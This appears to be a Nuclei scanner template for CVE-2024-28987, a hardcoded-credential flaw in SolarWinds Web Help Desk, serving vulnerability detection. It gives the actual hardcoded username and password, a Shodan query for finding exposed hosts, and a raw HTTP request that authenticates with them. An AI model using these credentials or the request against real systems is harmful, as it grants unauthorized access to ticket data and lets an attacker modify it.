id: CVE-2024-28987 info: name: SolarWinds Web Help Desk - Hardcoded Credential author: iamnoooob,rootxharsh,pdresearch severity: critical description: | The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data. impact: | Attackers with knowledge of the hardcoded credentials can gain unauthorized access to the SolarWinds Web Help Desk system. remediation: | Update SolarWinds Web Help Desk to a version that removes the hardcoded credentials. reference: - https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2 - https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987 - https://nvd.nist.gov/vuln/detail/CVE-2024-28987 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2024-28987 cwe-id: CWE-798 epss-score: 0.9429 epss-percentile: 0.99945 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:1895809524 tags: cve,cve2024,exposure,solarwinds,help-desk,kev,vkev,vuln variables: username: "helpdeskIntegrationUser" password: "dev-C4F8025E7" http: - raw: - | GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username+':'+password)}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word part: body words: - displayClient - shortDetail condition: and - type: status status: - 200 # digest: 490a0046304402206bcf0d33c620c075a7496fb9185dfad76791b06503e6c524361b5eebdd6f5ed502207f84f83cc12cb3508305654d0d3003f68a7bb96d1524d283185640d66202946f:922c64590222798bb761d5b6d8e72950